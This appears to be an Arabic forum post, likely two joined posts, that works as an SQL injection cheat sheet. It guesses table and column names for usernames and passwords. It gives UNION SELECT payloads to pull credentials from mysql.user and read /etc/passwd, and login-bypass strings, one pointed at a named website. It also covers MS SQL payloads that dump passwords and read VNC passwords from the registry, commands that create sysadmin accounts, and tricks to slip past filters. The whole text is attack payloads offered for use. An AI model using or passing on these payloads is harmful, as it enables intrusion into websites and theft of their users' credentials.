كود:
السلام عليكم
هده جميع اوامر التي تحتاجها للحقن
نبـدإ
*_&
تخمين أسماء قواعد البيانات
user
users
mysql.user
mysql.db
mysql.dbh
smf_members
users+where+user_id=1
admin+where+admin_id=1
admin
accounts
std_users
sys_user
main
sf_usr
tt_user
mo_user
mos_user
login
mysql.user
mysql.users
admin_login
jos_users
jos_session
wp_users
bg_users
usuarios
login_username
user_login
admin_sections
members
=========================
تخمين أسماء اليوزرات
admin
adminlogin
login
member
membername
user_name
user
users
username
user_name
loginmember
membername
admin_lastname
lastname
fristname
uname
name
user_login
aid
id
user_sections
user_username
user_id
user_first_name
========================
تخمين أسماء الباسوردات
password
pass
passwd
pwd
user_password
admin_password
pass
passwd
pwd
user_pass
user_password
=======================
اسماء اليوزرات المحتمله في قواعد البيانات وقت الحقن
user & users & user**** & admin & adminlogim & login & member & member****
user_****
الان اسماء الباسوردات المحتمله في قواعد البيانات وقت الحقن
password & pass & passwd & pwd
اسماء قواعد البيانات المحتمله في اي موقع وانت وتخمينك في الحقن هذي الكلمات المتداوله بكثره بين الناس
user
users
mysql.user
mysql.db
mysql.dbh
smf_members
ناخذ امثله على الكلمات السابقه للتوضيح وقت الحقن
الان مثلا اشم قاعدة البيانات في ( mysql.user ) في موقع ما كيف نستخرج يوزر الموقع ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
union+select+1,2,user,4,5+from+mysql.user
لوبدنا نستخرج باسورد اليوزريلي خرج لنا بيكون الاستغلال بهذا الشكلunion+select+1,2,password,4,5+from+mysql.user
مثال اخر على الكلمات السابقه للتوضيع
union+select+1,2,member****,4,5+from+smf_members
لاستخراج الجداول في قواعد البيانات وقت الحقن
union+select+1,2,table_****,4,5+from+information_s chema.tables
لاستخراج الاعمده في قواحد البيانات وقت الحقن
union+select+1,2,column_****,4,5+from+information_ schema.columns
الان مثلاً اردنا استخراج العضويه رقم ( 1 ) يكون الاستغلال بهذا الشكل
طبعاً مع تغير كلمة user الى اي كلمه تخمنها من الكلمات المستخدمه لليوزرات المذكوره سابقاً
union+select+1,2,user****,4,5+from+users+where+use rid=1/*
الان امر مهم في الحقن لقرائة ملفات السيرفر لو كان السيرفر يسمح لك بالقرائه
load_file("/هنا الاوامر")
مثال على هذا
union+select+1,load_file("/"),3,4+from+mysql.user
وتكون الاوامر داخل القوسين مثال يوضح امر قراءة حسابات السيرفر
union+select+1,load_file("/etc/passwd"),3,4+from+mysql.user
او نجرب هذا نفس الامر بس نتراجع للخلف
union+select+1,load_file("/../../etc/passwd"),3,4+from+mysql.user
الكلمات المحتمله للحصول على بيانات الـ FTP وقت الحقن
هذا الامر خاص بالبحث في الجداول
union+select+1,2,table_****,4,5+from+information_s chema.tables+where+table_****+like+'%25ftp%25'/*
هذا الامر خاص بالبحث في الاعمده
union+select+1,2,column_****,4,5+from+information_ schema.columns+where+column_****+like+'%25ftp%25'/*
FTP ملاحظه مهمه في الامرين السابقين في البحث عن بيانات الـ
'%25ftp%25' <<< في هذا الامر
----------------------
السسلام عليكم
حبيت آنزلكم .. بعض الاوآمر اللي بتفيدكم في استغلال وتخطي ثغرات SQL ..
بسم الله ..
1- حركات اساسية تستخدم لتسجيل الدخول بدون يوزر وباس :
- Login:' or 1=1--
- Pass:' or 1=1--
- http://dz4all.com/cc/newthread.php?do=' or 1=1--
########################
2- حركات اخرى معروووفة للجميع تستخدم في قواعد MsSQL:
- ' having 1=1--
- ' group by userid having 1=1--
- ' SELECT **** FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE **** = 'table****')--
- ' union select sum(column****) from table****--
########################
3- تجميع المعلومات :
- ' or 1 in (select @@version)--
- ' union all select @@version--
########################
4- انواع قواعد البيانات واهم القواعد الاساسية الملحقة بها :
-->SYS.USER_OBJECTS (USEROBJECTS)
-->SYS.USER_VIEWS
-->SYS.USER_TABLES
-->SYS.USER_VIEWS
-->SYS.USER_TAB_COLUMNS
-->SYS.USER_CATALOG
-->SYS.USER_TRIGGERS
-->SYS.ALL_TABLES
-->SYS.TAB
MySQL
-->mysql.user
-->mysql.host
-->mysql.db
MS access
-->MsysACEs
-->MsysObjects
-->MsysQueries
-->MsysRelationships
MS SQL Server
-->sysobjects
-->syscolumns
-->systypes
-->sysdatabases
########################
5- سحب كلمات السر :
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)--
' ; drop table temp --
########################
6- انشاء حسابات مستخدمين على القواعد المختلفة :
MS SQL
exec sp_addlogin '****' , 'password'
exec sp_addsrvrolemember '****' , 'sysadmin'
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('****', 'localhost', PASSWORD('pas23'))
Access
CRATE USER **** IDENTIFIED BY '123456'
Postgres (requires Unix account)
CRATE USER **** WITH PASSWORD '123456'
Oracle
CRATE USER **** IDENTIFIED BY 123456
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO ****;
GRANT RESOURCE TO ****;
########################
7- استدعاء ملف من السيرفر :
- ' union select 1,load_file('/etc/passwd'),1,1,1;
########################
8- معرفة اسم السيرفر والكونفج :
- ' and 1 in (select @@server****)--
- ' and 1 in (select server**** from master.sysservers)--
########################
9- الحصول على اسم المستخدم والباسورد للـفي ان اس :
- '; declare @out binary(8)
- exec master..xp_regread
- @rootkey = 'HKEY_LOCAL_MACHINE',
- @key = 'SOFTWARE\ORL\WinVNC3\Default',
- @value_****='password',
- @value = @out output
- select cast (@out as bigint) as x into TEMP--
- ' and 1 in (select cast(x as varchar) from temp)--
########################
10- التحايل على صناديق ادخال اسم المستخدم وكلمات السر :
- ' OR 'unusual' = 'unusual'
- ' OR 'something' = 'some'+'thing'
- ' OR '****' = N'****'
- ' OR 'something' like 'some%'
- ' OR 2 > 1
- ' OR '****' > 't'
- ' OR 'whatever' in ('whatever')
- ' OR 2 BETWEEN 1 and 3
########################
11- النقطة السابقة نفسها لكن باستخدام الفواصل والشرطات نستخدم /**/ لتخطي الفلتره على علامة + او المسافة :
-->'/**/OR/**/1/**/=/**/1
-->User****:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle) '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL) '; EXEC ('SEL' + 'ECT US' + 'ER')
###########